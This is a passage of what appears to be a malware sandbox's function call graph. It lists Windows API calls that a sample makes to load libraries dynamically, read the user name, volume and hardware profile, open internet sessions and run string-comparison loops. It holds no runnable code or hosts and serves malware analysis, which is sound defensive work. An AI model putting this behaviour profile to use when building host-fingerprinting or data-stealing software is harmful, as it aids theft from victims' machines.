10 API calls 71454->71455 71456 402a4a 71455->71456 71457 4022a0 10 API calls 71456->71457 71458 402a60 71457->71458 71459 4022a0 10 API calls 71458->71459 71460 402a76 71459->71460 71461 4022a0 10 API calls 71460->71461 71462 402a8c 71461->71462 71463 4022a0 10 API calls 71462->71463 71464 402aa2 71463->71464 71465 4022a0 10 API calls 71464->71465 71466 402abb 71465->71466 71467 4022a0 10 API calls 71466->71467 71468 402ad1 71467->71468 71469 4022a0 10 API calls 71468->71469 71470 402ae7 71469->71470 71471 418460 LoadLibraryA 71470->71471 71472 418687 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 71471->71472 71473 418478 GetProcAddress 71471->71473 71474 4186e8 GetProcAddress 71472->71474 71475 4186fb 71472->71475 71476 41849b 20 API calls 71473->71476 71474->71475 71477 418704 GetProcAddress GetProcAddress 71475->71477 71478 41872f 71475->71478 71476->71472 71477->71478 71479 418738 GetProcAddress 71478->71479 71480 41874b 71478->71480 71479->71480 71481 418754 GetProcAddress 71480->71481 71482 418767 71480->71482 71481->71482 71483 418770 GetProcAddress GetProcAddress 71482->71483 71484 418370 71482->71484 71483->71484 71485 40fd00 71484->71485 71486 40fd10 71485->71486 71487 40fd2f 71486->71487 71488 40fd27 lstrcpy 71486->71488 71489 410100 GetProcessHeap HeapAlloc GetUserNameA 71487->71489 71488->71487 71489->71375 71492 40ff0f 71490->71492 71491 40ff37 71491->71378 71492->71491 71493 40ff25 lstrcpy lstrcat 71492->71493 71493->71491 71496 40fdf6 71494->71496 71495 40fe26 71495->71383 71496->71495 71497 40fe1e lstrcpy 71496->71497 71497->71495 71499 417b02 71498->71499 71500 40fd00 lstrcpy 71499->71500 71501 417b14 71500->71501 71662 40fd90 lstrlenA 71501->71662 71504 40fd90 2 API calls 71505 417b8a 71504->71505 71666 402af0 71505->71666 71513 417c6d 71514 40fde0 lstrcpy 71513->71514 71515 417c82 71514->71515 71516 40fde0 lstrcpy 71515->71516 71517 417c91 71516->71517 71518 40fde0 lstrcpy 71517->71518 71519 417ca0 71518->71519 71520 40fde0 lstrcpy 71519->71520 71521 417cdf 71520->71521 71522 40fde0 lstrcpy 71521->71522 71523 417cee 71522->71523 72389 40fd40 71523->72389 71526 40fec0 3 API calls 71527 417d1b 71526->71527 71528 40fde0 lstrcpy 71527->71528 71529 417d2b 71528->71529 72393 40fe30 71529->72393 71532 40fde0 lstrcpy 71533 417d63 71532->71533 71534 417d7f InternetOpenA 71533->71534 72397 40ffa0 71534->72397 71536 417d96 InternetOpenA 71537 40fd40 lstrcpy 71536->71537 71538 417dc0 71537->71538 72398 402370 71538->72398 71542 417de4 71543 40fd40 lstrcpy 71542->71543 71544 417dfc 71543->71544 72420 404420 71544->72420 71546 417e06 72557 412670 71546->72557 71548 417e0e 71549 40fd00 lstrcpy 71548->71549 71550 417e42 71549->71550 71551 401060 lstrcpy 71550->71551 71552 417e5a 71551->71552 72577 405bc0 71552->72577 71554 417e64 72757 412020 71554->72757 71556 417e6c 71557 40fd00 lstrcpy 71556->71557 71558 417e94 71557->71558 71559 401060 lstrcpy 71558->71559 71560 417eac 71559->71560 71561 405bc0 41 API calls 71560->71561 71562 417eb6 71561->71562 72765 411e70 71562->72765 71564 417ebe 71565 401060 lstrcpy 71564->71565 71566 417ed2 71565->71566 72776 415530 71566->72776 71568 417ed7 71569 40fd40 lstrcpy 71568->71569 71570 417ee8 71569->71570 71571 40fd00 lstrcpy 71570->71571 71572 417f05 71571->71572 73122 404b20 71572->73122 71574 417f0e 71575 401060 lstrcpy 71574->71575 71576 417f4e 71575->71576 73143 40e800 71576->73143 71659 402326 lstrlenA lstrlenA 71658->71659 71660 4022cd 71658->71660 71659->71394 71661 4022d5 7 API calls 71660->71661 71661->71659 71661->71661 71663 40fdaa 71662->71663 71664 40fdd8 71663->71664 71665 40fdd0 lstrcpy 71663->71665 71664->71504 71665->71664 71667 4022a0 10 API calls 71666->71667 71668 402b01 71667->71668 71669 4022a0 10 API calls 71668->71669 71670 402b17 71669->71670 71671 4022a0 10 API calls 71670->71671 71672 402b2d 71671->71672 71673 4022a0 10 API calls 71672->71673 71674 402b43 71673->71674 71675 4022a0 10 API calls 71674->71675 71676 402b59 71675->71676 71677 4022a0 10 API calls 71676->71677 71678 402b6f 71677->71678 71679 4022a0 10 API calls 71678->71679 71680 402b88 71679->71680 71681 4022a0 10 API calls 71680->71681 71682 402b9e 71681->71682 71683 4022a0 10 API calls 71682->71683 71684 402bb4 71683->71684 71685 4022a0 10 API calls 71684->71685 71686 402bca 71685->71686 71687 4022a0 10 API calls 71686->71687 71688 402be0 71687->71688 71689 4022a0 10 API calls 71688->71689 71690 402bf6 71689->71690 71691 4022a0 10 API calls 71690->71691 71692 402c0f 71691->71692 71693 4022a0 10 API calls 71692->71693 71694 402c25 71693->71694 71695 4022a0 10 API calls 71694->71695 71696 402c3b 71695->71696 71697 4022a0 10 API calls 71696->71697 71698 402c51 71697->71698 71699 4022a0 10 API calls 71698->71699 71700 402c67 71699->71700 71701 4022a0 10 API calls 71700->71701 71702 402c7d 71701->71702 71703 4022a0 10 API calls 71702->71703 71704 402c96 71703->71704 71705 4022a0 10 API calls 71704->71705 71706 402cac 71705->71706 71707 4022a0 10 API calls 71706->71707 71708 402cc2 71707->71708 71709 4022a0 10 API calls 71708->71709 71710 402cd8 71709->71710 71711 4022a0 10 API calls 71710->71711 71712 402cee 71711->71712 71713 4022a0 10 API calls 71712->71713 71714 402d04 71713->71714 71715 4022a0 10 API calls 71714->71715 71716 402d1d 71715->71716 71717 4022a0 10 API calls 71716->71717 71718 402d33 71717->71718 71719 4022a0 10 API calls 71718->71719 71720 402d49 71719->71720 71721 4022a0 10 API calls 71720->71721 71722 402d5f 71721->71722 71723 4022a0 10 API calls 71722->71723 71724 402d75 71723->71724 71725 4022a0 10 API calls 71724->71725 71726 402d8b 71725->71726 71727 4022a0 10 API calls 71726->71727 71728 402da4 71727->71728 71729 4022a0 10 API calls 71728->71729 71730 402dba 71729->71730 71731 4022a0 10 API calls 71730->71731 71732 402dd0 71731->71732 71733 4022a0 10 API calls 71732->71733 71734 402de6 71733->71734 71735 4022a0 10 API calls 71734->71735 71736 402dfc 71735->71736 71737 4022a0 10 API calls 71736->71737 71738 402e12 71737->71738 71739 4022a0 10 API calls 71738->71739 71740 402e2b 71739->71740 71741 4022a0 10 API calls 71740->71741 71742 402e41 71741->71742 71743 4022a0 10 API calls 71742->71743 71744 402e57 71743->71744 71745 4022a0 10 API calls 71744->71745 71746 402e6d 71745->71746 71747 4022a0 10 API calls 71746->71747 71748 402e83 71747->71748 71749 4022a0 10 API calls 71748->71749 71750 402e99 71749->71750 71751 4022a0 10 API calls 71750->71751 71752 402eb2 71751->71752 71753 4022a0 10 API calls 71752->71753 71754 402ec8 71753->71754 71755 4022a0 10 API calls 71754->71755 71756 402ede 71755->71756 71757 4022a0 10 API calls 71756->71757 71758 402ef4 71757->71758 71759 4022a0 10 API calls 71758->71759 71760 402f0a 71759->71760 71761 4022a0 10 API calls 71760->71761 71762 402f20 71761->71762 71763 4022a0 10 API calls 71762->71763 71764 402f39 71763->71764 71765 4022a0 10 API calls 71764->71765 71766 402f4f 71765->71766 71767 4022a0 10 API calls 71766->71767 71768 402f65 71767->71768 71769 4022a0 10 API calls 71768->71769 71770 402f7b 71769->71770 71771 4022a0 10 API calls 71770->71771 71772 402f91 71771->71772 71773 4022a0 10 API calls 71772->71773 71774 402fa7 71773->71774 71775 4022a0 10 API calls 71774->71775 71776 402fc0 71775->71776 71777 4022a0 10 API calls 71776->71777 71778 402fd6 71777->71778 71779 4022a0 10 API calls 71778->71779 71780 402fec 71779->71780 71781 4022a0 10 API calls 71780->71781 71782 403002 71781->71782 71783 4022a0 10 API calls 71782->71783 71784 403018 71783->71784 71785 4022a0 10 API calls 71784->71785 71786 40302e 71785->71786 71787 4022a0 10 API calls 71786->71787 71788 403047 71787->71788 71789 4022a0 10 API calls 71788->71789 71790 40305d 71789->71790 71791 4022a0 10 API calls 71790->71791 71792 403073 71791->71792 71793 4022a0 10 API calls 71792->71793 71794 403089 71793->71794 71795 4022a0 10 API calls 71794->71795 71796 40309f 71795->71796 71797 4022a0 10 API calls 71796->71797 71798 4030b5 71797->71798 71799 4022a0 10 API calls 71798->71799 71800 4030ce 71799->71800 71801 4022a0 10 API calls 71800->71801 71802 4030e4 71801->71802 71803 4022a0 10 API calls 71802->71803 71804 4030fa 71803->71804 71805 4022a0 10 API calls 71804->71805 71806 403110 71805->71806 71807 4022a0 10 API calls 71806->71807 71808 403126 71807->71808 71809 4022a0 10 API calls 71808->71809 71810 40313c 71809->71810 71811 4022a0 10 API calls 71810->71811 71812 403155 71811->71812 71813 4022a0 10 API calls 71812->71813 71814 40316b 71813->71814 71815 4022a0 10 API calls 71814->71815 71816 403181 71815->71816 71817 4022a0 10 API calls 71816->71817 71818 403197 71817->71818 71819 4022a0 10 API calls 71818->71819 71820 4031ad 71819->71820 71821 4022a0 10 API calls 71820->71821 71822 4031c3 71821->71822 71823 4022a0 10 API calls 71822->71823 71824 4031dc 71823->71824 71825 4022a0 10 API calls 71824->71825 71826 4031f2 71825->71826 71827 4022a0 10 API calls 71826->71827 71828 403208 71827->71828 71829 4022a0 10 API calls 71828->71829 71830 40321e 71829->71830 71831 4022a0 10 API calls 71830->71831 71832 403234 71831->71832 71833 4022a0 10 API calls 71832->71833 71834 40324a 71833->71834 71835 4022a0 10 API calls 71834->71835 71836 403263 71835->71836 71837 4022a0 10 API calls 71836->71837 71838 403279 71837->71838 71839 4022a0 10 API calls 71838->71839 71840 40328f 71839->71840 71841 4022a0 10 API calls 71840->71841 71842 4032a5 71841->71842 71843 4022a0 10 API calls 71842->71843 71844 4032bb 71843->71844 71845 4022a0 10 API calls 71844->71845 71846 4032d1 71845->71846 71847 4022a0 10 API calls 71846->71847 71848 4032ea 71847->71848 71849 4022a0 10 API calls 71848->71849 71850 403300 71849->71850 71851 4022a0 10 API calls 71850->71851 71852 403316 71851->71852 71853 4022a0 10 API calls 71852->71853 71854 40332c 71853->71854 71855 4022a0 10 API calls 71854->71855 71856 403342 71855->71856 71857 4022a0 10 API calls 71856->71857 71858 403358 71857->71858 71859 4022a0 10 API calls 71858->71859 71860 403371 71859->71860 71861 4022a0 10 API calls 71860->71861 71862 403387 71861->71862 71863 4022a0 10 API calls 71862->71863 71864 40339d 71863->71864 71865 4022a0 10 API calls 71864->71865 71866 4033b3 71865->71866 71867 4022a0 10 API calls 71866->71867 71868 4033c9 71867->71868 71869 4022a0 10 API calls 71868->71869 71870 4033df 71869->71870 71871 4022a0 10 API calls 71870->71871 71872 4033f8 71871->71872 71873 4022a0 10 API calls 71872->71873 71874 40340e 71873->71874 71875 4022a0 10 API calls 71874->71875 71876 403424 71875->71876 71877 4022a0 10 API calls 71876->71877 71878 40343a 71877->71878 71879 4022a0 10 API calls 71878->71879 71880 403450 71879->71880 71881 4022a0 10 API calls 71880->71881 71882 403466 71881->71882 71883 4022a0 10 API calls 71882->71883 71884 40347f 71883->71884 71885 4022a0 10 API calls 71884->71885 71886 403495 71885->71886 71887 4022a0 10 API calls 71886->71887 71888 4034ab 71887->71888 71889 4022a0 10 API calls 71888->71889 71890 4034c1 71889->71890 71891 4022a0 10 API calls 71890->71891 71892 4034d7 71891->71892 71893 4022a0 10 API calls 71892->71893 71894 4034ed 71893->71894 71895 4022a0 10 API calls 71894->71895 71896 403506 71895->71896 71897 4022a0 10 API calls 71896->71897 71898 40351c 71897->71898 71899 4022a0 10 API calls 71898->71899 71900 403532 71899->71900 71901 4022a0 10 API calls 71900->71901 71902 403548 71901->71902 71903 4022a0 10 API calls 71902->71903 71904 40355e 71903->71904 71905 4022a0 10 API calls 71904->71905 71906 403574 71905->71906 71907 4022a0 10 API calls 71906->71907 71908 40358d 71907->71908 71909 4022a0 10 API calls 71908->71909 71910 4035a3 71909->71910 71911 4022a0 10 API calls 71910->71911 71912 4035b9 71911->71912 71913 4022a0 10 API calls 71912->71913 71914 4035cf 71913->71914 71915 4022a0 10 API calls 71914->71915 71916 4035e5 71915->71916 71917 4022a0 10 API calls 71916->71917 71918 4035fb 71917->71918 71919 4022a0 10 API calls 71918->71919 71920 403614 71919->71920 71921 4022a0 10 API calls 71920->71921 71922 40362a 71921->71922 71923 4022a0 10 API calls 71922->71923 71924 403640 71923->71924 71925 4022a0 10 API calls 71924->71925 71926 403656 71925->71926 71927 4022a0 10 API calls 71926->71927 71928 40366c 71927->71928 71929 4022a0 10 API calls 71928->71929 71930 403682 71929->71930 71931 4022a0 10 API calls 71930->71931 71932 40369b 71931->71932 71933 4022a0 10 API calls 71932->71933 71934 4036b1 71933->71934 71935 4022a0 10 API calls 71934->71935 71936 4036c7 71935->71936 71937 4022a0 10 API calls 71936->71937 71938 4036dd 71937->71938 71939 4022a0 10 API calls 71938->71939 71940 4036f3 71939->71940 71941 4022a0 10 API calls 71940->71941 71942 403709 71941->71942 71943 4022a0 10 API calls 71942->71943 71944 403722 71943->71944 71945 4022a0 10 API calls 71944->71945 71946 403738 71945->71946 71947 4022a0 10 API calls 71946->71947 71948 40374e 71947->71948 71949 4022a0 10 API calls 71948->71949 71950 403764 71949->71950 71951 4022a0 10 API calls 71950->71951 71952 40377a 71951->71952 71953 4022a0 10 API calls 71952->71953 71954 403790 71953->71954 71955 4022a0 10 API calls 71954->71955 71956 4037a9 71955->71956 71957 4022a0 10 API calls 71956->71957 71958 4037bf 71957->71958 71959 4022a0 10 API calls 71958->71959 71960 4037d5 71959->71960 71961 4022a0 10 API calls 71960->71961 71962 4037eb 71961->71962 71963 4022a0 10 API calls 71962->71963 71964 403801 71963->71964 71965 4022a0 10 API calls 71964->71965 71966 403817 71965->71966 71967 4022a0 10 API calls 71966->71967 71968 403830 71967->71968 71969 4022a0 10 API calls 71968->71969 71970 403846 71969->71970 71971 4022a0 10 API calls 71970->71971 71972 40385c 71971->71972 71973 4022a0 10 API calls 71972->71973 71974 403872 71973->71974 71975 4022a0 10 API calls 71974->71975 71976 403888 71975->71976 71977 4022a0 10 API calls 71976->71977 71978 40389e 71977->71978 71979 4022a0 10 API calls 71978->71979 71980 4038b7 71979->71980 71981 4022a0 10 API calls 71980->71981 71982 4038cd 71981->71982 71983 4022a0 10 API calls 71982->71983 71984 4038e3 71983->71984 71985 4022a0 10 API calls 71984->71985 71986 4038f9 71985->71986 71987 4022a0 10 API calls 71986->71987 71988 40390f 71987->71988 71989 4022a0 10 API calls 71988->71989 71990 403925 71989->71990 71991 4022a0 10 API calls 71990->71991 71992 40393e 71991->71992 71993 4022a0 10 API calls 71992->71993 71994 403954 71993->71994 71995 4022a0 10 API calls 71994->71995 71996 40396a 71995->71996 71997 4022a0 10 API calls 71996->71997 71998 403980 71997->71998 71999 4022a0 10 API calls 71998->71999 72000 403996 71999->72000 72001 4022a0 10 API calls 72000->72001 72002 4039ac 72001->72002 72003 4022a0 10 API calls 72002->72003 72004 4039c5 72003->72004 72005 4022a0 10 API calls 72004->72005 72006 4039db 72005->72006 72007 4022a0 10 API calls 72006->72007 72008 4039f1 72007->72008 72009 4022a0 10 API calls 72008->72009 72010 403a07 72009->72010 72011 4022a0 10 API calls 72010->72011 72012 403a1d 72011->72012 72013 4022a0 10 API calls 72012->72013 72014 403a33 72013->72014 72015 4022a0 10 API calls 72014->72015 72016 403a4c 72015->72016 72017 4022a0 10 API calls 72016->72017 72018 403a62 72017->72018 72019 4022a0 10 API calls 72018->72019 72020 403a78 72019->72020 72021 4022a0 10 API calls 72020->72021 72022 403a8e 72021->72022 72023 4022a0 10 API calls 72022->72023 72024 403aa4 72023->72024 72025 4022a0 10 API calls 72024->72025 72026 403aba 72025->72026 72027 4022a0 10 API calls 72026->72027 72028 403ad3 72027->72028 72029 4022a0 10 API calls 72028->72029 72030 403ae9 72029->72030 72031 4022a0 10 API calls 72030->72031 72032 403aff 72031->72032 72033 4022a0 10 API calls 72032->72033 72034 403b15 72033->72034 72035 4022a0 10 API calls 72034->72035 72036 403b2b 72035->72036 72037 4022a0 10 API calls 72036->72037 72038 403b41 72037->72038 72039 4022a0 10 API calls 72038->72039 72040 403b5a 72039->72040 72041 4022a0 10 API calls 72040->72041 72042 403b70 72041->72042 72043 4022a0 10 API calls 72042->72043 72044 403b86 72043->72044 72045 4022a0 10 API calls 72044->72045 72046 403b9c 72045->72046 72047 4022a0 10 API calls 72046->72047 72048 403bb2 72047->72048 72049 4022a0 10 API calls 72048->72049 72050 403bc8 72049->72050 72051 4022a0 10 API calls 72050->72051 72052 403be1 72051->72052 72053 4022a0 10 API calls 72052->72053 72054 403bf7 72053->72054 72055 4022a0 10 API calls 72054->72055 72056 403c0d 72055->72056 72057 4022a0 10 API calls 72056->72057 72058 403c23 72057->72058 72059 4022a0 10 API calls 72058->72059 72060 403c39 72059->72060 72061 4022a0 10 API calls 72060->72061 72062 403c4f 72061->72062 72063 4022a0 10 API calls 72062->72063 72064 403c68 72063->72064 72065 4022a0 10 API calls 72064->72065 72066 403c7e 72065->72066 72067 4022a0 10 API calls 72066->72067 72068 403c94 72067->72068 72069 4022a0 10 API calls 72068->72069 72070 403caa 72069->72070 72071 4022a0 10 API calls 72070->72071 72072 403cc0 72071->72072 72073 4022a0 10 API calls 72072->72073 72074 403cd6 72073->72074 72075 4022a0 10 API calls 72074->72075 72076 403cef 72075->72076 72077 4022a0 10 API calls 72076->72077 72078 403d05 72077->72078 72079 4022a0 10 API calls 72078->72079 72080 403d1b 72079->72080 72081 4022a0 10 API calls 72080->72081 72082 403d31 72081->72082 72083 4022a0 10 API calls 72082->72083 72084 403d47 72083->72084 72085 4022a0 10 API calls 72084->72085 72086 403d5d 72085->72086 72087 4022a0 10 API calls 72086->72087 72088 403d76 72087->72088 72089 4022a0 10 API calls 72088->72089 72090 403d8c 72089->72090 72091 4022a0 10 API calls 72090->72091 72092 403da2 72091->72092 72093 4022a0 10 API calls 72092->72093 72094 403db8 72093->72094 72095 4022a0 10 API calls 72094->72095 72096 403dce 72095->72096 72097 4022a0 10 API calls 72096->72097 72098 403de4 72097->72098 72099 4022a0 10 API calls 72098->72099 72100 403dfd 72099->72100 72101 4022a0 10 API calls 72100->72101 72102 403e13 72101->72102 72103 4022a0 10 API calls 72102->72103 72104 403e29 72103->72104 72105 4022a0 10 API calls 72104->72105 72106 403e3f 72105->72106 72107 4022a0 10 API calls 72106->72107 72108 403e55 72107->72108 72109 4022a0 10 API calls 72108->72109 72110 403e6b 72109->72110 72111 4022a0 10 API calls 72110->72111 72112 403e84 72111->72112 72113 4022a0 10 API calls 72112->72113 72114 403e9a 72113->72114 72115 4022a0 10 API calls 72114->72115 72116 403eb0 72115->72116 72117 4022a0 10 API calls 72116->72117 72118 403ec6 72117->72118 72119 4022a0 10 API calls 72118->72119 72120 403edc 72119->72120 72121 4022a0 10 API calls 72120->72121 72122 403ef2 72121->72122 72123 4022a0 10 API calls 72122->72123 72124 403f0b 72123->72124 72125 4022a0 10 API calls 72124->72125 72126 403f21 72125->72126 72127 4022a0 10 API calls 72126->72127 72128 403f37 72127->72128 72129 4022a0 10 API calls 72128->72129 72130 403f4d 72129->72130 72131 4022a0 10 API calls 72130->72131 72132 403f63 72131->72132 72133 4022a0 10 API calls 72132->72133 72134 403f79 72133->72134 72135 4022a0 10 API calls 72134->72135 72136 403f92 72135->72136 72137 4022a0 10 API calls 72136->72137 72138 403fa8 72137->72138 72139 4022a0 10 API calls 72138->72139 72140 403fbe 72139->72140 72141 4022a0 10 API calls 72140->72141 72142 403fd4 72141->72142 72143 4022a0 10 API calls 72142->72143 72144 403fea 72143->72144 72145 4022a0 10 API calls 72144->72145 72146 404000 72145->72146 72147 4022a0 10 API calls 72146->72147 72148 404019 72147->72148 72149 4022a0 10 API calls 72148->72149 72150 40402f 72149->72150 72151 4022a0 10 API calls 72150->72151 72152 404045 72151->72152 72153 4022a0 10 API calls 72152->72153 72154 40405b 72153->72154 72155 4022a0 10 API calls 72154->72155 72156 404071 72155->72156 72157 4022a0 10 API calls 72156->72157 72158 404087 72157->72158 72159 4022a0 10 API calls 72158->72159 72160 4040a0 72159->72160 72161 4022a0 10 API calls 72160->72161 72162 4040b6 72161->72162 72163 4022a0 10 API calls 72162->72163 72164 4040cc 72163->72164 72165 4022a0 10 API calls 72164->72165 72166 4040e2 72165->72166 72167 4022a0 10 API calls 72166->72167 72168 4040f8 72167->72168 72169 4022a0 10 API calls 72168->72169 72170 40410e 72169->72170 72171 4022a0 10 API calls 72170->72171 72172 404127 72171->72172 72173 4022a0 10 API calls 72172->72173 72174 40413d 72173->72174 72175 4022a0 10 API calls 72174->72175 72176 404153 72175->72176 72177 4022a0 10 API calls 72176->72177 72178 404169 72177->72178 72179 4022a0 10 API calls 72178->72179 72180 40417f 72179->72180 72181 4022a0 10 API calls 72180->72181 72182 404195 72181->72182 72183 4022a0 10 API calls 72182->72183 72184 4041ae 72183->72184 72185 4022a0 10 API calls 72184->72185 72186 4041c4 72185->72186 72187 4022a0 10 API calls 72186->72187 72188 4041da 72187->72188 72189 4022a0 10 API calls 72188->72189 72190 4041f0 72189->72190 72191 4022a0 10 API calls 72190->72191 72192 404206 72191->72192 72193 4022a0 10 API calls 72192->72193 72194 40421c 72193->72194 72195 4022a0 10 API calls 72194->72195 72196 404235 72195->72196 72197 4022a0 10 API calls 72196->72197 72198 40424b 72197->72198 72199 4022a0 10 API calls 72198->72199 72200 404261 72199->72200 72201 4022a0 10 API calls 72200->72201 72202 404277 72201->72202 72203 4022a0 10 API calls 72202->72203 72204 40428d 72203->72204 72205 4022a0 10 API calls 72204->72205 72206 4042a3 72205->72206 72207 4022a0 10 API calls 72206->72207 72208 4042bc 72207->72208 72209 4022a0 10 API calls 72208->72209 72210 4042d2 72209->72210 72211 4022a0 10 API calls 72210->72211 72212 4042e8 72211->72212 72213 4022a0 10 API calls 72212->72213 72214 4042fe 72213->72214 72215 4022a0 10 API calls 72214->72215 72216 404314 72215->72216 72217 4022a0 10 API calls 72216->72217 72218 40432a 72217->72218 72219 4022a0 10 API calls 72218->72219 72220 404343 72219->72220 72221 4187b0 72220->72221 72222 4187bd 43 API calls 72221->72222 72223 418bce 9 API calls 72221->72223 72222->72223 72224 418c74 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 72223->72224 72225 418ce8 72223->72225 72224->72225 72226 418db2 72225->72226 72227 418cf5 8 API calls 72225->72227 72228 418dbb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 72226->72228 72229 418e2f 72226->72229 72227->72226 72228->72229 72230 418ec9 72229->72230 72231 418e3c 6 API calls 72229->72231 72232 418ed6 9 API calls 72230->72232 72233 418fac 72230->72233 72231->72230 72232->72233 72234 418fb5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 72233->72234 72235 419029 72233->72235 72234->72235 72236 419032 GetProcAddress GetProcAddress 72235->72236 72237 41905d 72235->72237 72236->72237 72238 419091 72237->72238 72239 419066 GetProcAddress GetProcAddress 72237->72239 72240 419189 72238->72240 72241 41909e 10 API calls 72238->72241 72239->72238 72242 419192 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 72240->72242 72243 4191ee 72240->72243 72241->72240 72242->72243 72244 4191f7 GetProcAddress 72243->72244 72245 41920a 72243->72245 72244->72245 72246 419213 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 72245->72246 72247 41926f 72245->72247 72246->72247 72248 417c4d 72247->72248 72249 419278 GetProcAddress 72247->72249 72250 401060 72248->72250 72249->72248 72251 40fd40 lstrcpy 72250->72251 72252 401089 72251->72252 72253 40fd40 lstrcpy 72252->72253 72254 40109c 72253->72254 72255 40fd40 lstrcpy 72254->72255 72256 4010b8 72255->72256 72257 414200 72256->72257 72258 414238 72257->72258 72259 40fd90 2 API calls 72258->72259 72260 414261 72259->72260 72261 40fd90 2 API calls 72260->72261 72262 41426e 72261->72262 72263 40fd90 2 API calls 72262->72263 72264 41427b 72263->72264 72265 40fd00 lstrcpy 72264->72265 72266 414288 72265->72266 72267 40fd00 lstrcpy 72266->72267 72268 414299 72267->72268 72269 40fd00 lstrcpy 72268->72269 72270 4142aa 72269->72270 72271 40fd00 lstrcpy 72270->72271 72272 4142be 72271->72272 72273 40fd00 lstrcpy 72272->72273 72274 4142cf 72273->72274 72275 40fd00 lstrcpy 72274->72275 72382 4142e3 72275->72382 72276 4023a0 lstrcpy 72276->72382 72278 402400 lstrcpy 72278->72382 72279 40fd40 lstrcpy 72279->72382 72280 414507 StrCmpCA 72280->72382 72281 41459c StrCmpCA 72282 415176 72281->72282 72281->72382 72283 40fde0 lstrcpy 72282->72283 72284 415182 72283->72284 73371 402400 72284->73371 72287 40fde0 lstrcpy 72289 41519b 72287->72289 72288 41476f StrCmpCA 72290 415067 72288->72290 72288->72382 73374 402690 lstrcpy 72289->73374 72291 40fde0 lstrcpy 72290->72291 72293 415073 72291->72293 72292 402430 lstrcpy 72292->72382 73369 402490 lstrcpy 72293->73369 72297 4151af 72300 40fde0 lstrcpy 72297->72300 72298 41507c 72301 40fde0 lstrcpy 72298->72301 72299 41495b StrCmpCA 72302 414f55 72299->72302 72299->72382 72303 4151bf 72300->72303 72304 41508c 72301->72304 72305 40fde0 lstrcpy 72302->72305 72309 40fd40 lstrcpy 72303->72309 73370 4026c0 lstrcpy 72304->73370 72307 414f64 72305->72307 72306 402490 lstrcpy 72306->72382 73367 402520 lstrcpy 72307->73367 72313 4151d8 72309->72313 72312 414f6d 72316 40fde0 lstrcpy 72312->72316 72319 40fd40 lstrcpy 72313->72319 72314 4150a0 72315 40fde0 lstrcpy 72314->72315 72321 4150b0 72315->72321 72322 414f7d 72316->72322 72317 401060 lstrcpy 72317->72382 72318 414b2e StrCmpCA 72323 414e40 72318->72323 72318->72382 72320 4151e8 72319->72320 72324 40fd40 lstrcpy 72320->72324 72331 40fd40 lstrcpy 72321->72331 73368 4026f0 lstrcpy 72322->73368 72325 40fde0 lstrcpy 72323->72325 72387 414db3 72324->72387 72328 414e4c 72325->72328 72326 402520 lstrcpy 72326->72382 72327 402550 lstrcpy 72327->72382 73365 4025b0 lstrcpy 72328->73365 72329 4146da StrCmpCA 72329->72382 72334 4150c9 72331->72334 72337 40fd40 lstrcpy 72334->72337 72335 414f91 72338 40fde0 lstrcpy 72335->72338 72336 414e55 72340 40fde0 lstrcpy 72336->72340 72342 4150d9 72337->72342 72343 414fa1 72338->72343 72339 414d0d StrCmpCA 72344 414d28 72339->72344 72345 414d18 Sleep 72339->72345 72346 414e65 72340->72346 72341 4024c0 lstrcpy 72341->72382 72350 40fd40 lstrcpy 72342->72350 72354 40fd40 lstrcpy 72343->72354 72348 40fde0 lstrcpy 72344->72348 72345->72382 73366 402720 lstrcpy 72346->73366 72347 4025b0 lstrcpy 72347->72382 72352 414d37 72348->72352 72349 4025e0 lstrcpy 72349->72382 72350->72387 72351 4148b9 StrCmpCA 72351->72382 73363 402640 lstrcpy 72352->73363 72357 414fba 72354->72357 72360 40fd40 lstrcpy 72357->72360 72358 414d40 72361 40fde0 lstrcpy 72358->72361 72359 414e7c 72362 40fde0 lstrcpy 72359->72362 72363 414fca 72360->72363 72364 414d50 72361->72364 72365 414e8c 72362->72365 72367 40fd40 lstrcpy 72363->72367 73364 402750 lstrcpy 72364->73364 72369 40fd40 lstrcpy 72365->72369 72366 413a50 29 API calls 72366->72382 72367->72387 72368 414a99 StrCmpCA 72368->72382 72371 414ea8 72369->72371 72373 40fd40 lstrcpy 72371->72373 72372 414d67 72374 40fde0 lstrcpy 72372->72374 72375 414eb8 72373->72375 72376 414d77 72374->72376 72377 40fd40 lstrcpy 72375->72377 72379 40fd40 lstrcpy 72376->72379 72377->72387 72378 414c78 StrCmpCA 72378->72382 72381 414d93 72379->72381 72380 402640 lstrcpy 72380->72382 72383 40fd40 lstrcpy 72381->72383 72382->72276 72382->72278 72382->72279 72382->72280 72382->72281 72382->72288 72382->72292 72382->72299 72382->72306 72382->72317 72382->72318 72382->72326 72382->72327 72382->72329 72382->72339 72382->72341 72382->72347 72382->72349 72382->72351 72382->72366 72382->72368 72382->72378 72382->72380 72386 40fde0 lstrcpy 72382->72386 72388 413910 24 API calls 72382->72388 73356 4023d0 72382->73356 73359 402460 lstrcpy 72382->73359 73360 4024f0 lstrcpy 72382->73360 73361 402580 lstrcpy 72382->73361 73362 402610 lstrcpy 72382->73362 72384 414da3 72383->72384 72385 40fd40 lstrcpy 72384->72385 72385->72387 72386->72382 72387->71513 72388->72382 72390 40fd57 72389->72390 72391 40fd6e 72390->72391 72392 40fd66 lstrcpy 72390->72392 72391->71526 72392->72391 72394 40fe7b 72393->72394 72395 40fea5 72394->72395 72396 40fe91 lstrcpy lstrcat 72394->72396 72395->71532 72396->72395 72397->71536 72399 40fd00 lstrcpy 72398->72399 72400 40238b 72399->72400 72401 410c10 GetWindowsDirectoryA 72400->72401 72402 410c52 72401->72402 72403 410c59 GetVolumeInformationA 72401->72403 72402->72403 72404 410c90 72403->72404 72405 410cc6 GetProcessHeap HeapAlloc 72404->72405 72406 410ce0 72405->72406 72407 410cfc wsprintfA lstrcat 72405->72407 72408 40fd00 lstrcpy 72406->72408 73375 410bb0 GetCurrentHwProfileA 72407->73375 72410 410ceb 72408->72410 72410->71542 72411 410d2f 72412 410d41 lstrlenA 72411->72412 72413 410d56 72412->72413 73382 411a30 lstrcpy malloc strncpy 72413->73382 72415 410d60 72416 410d6e lstrcat 72415->72416 72417 410d82 72416->72417 72418 40fd00 lstrcpy 72417->72418 72419 410d95 72418->72419 72419->71542 72421 40fd40 lstrcpy 72420->72421 72422 404460 72421->72422 73383 404350 72422->73383 72424 40446c 72425 40fd00 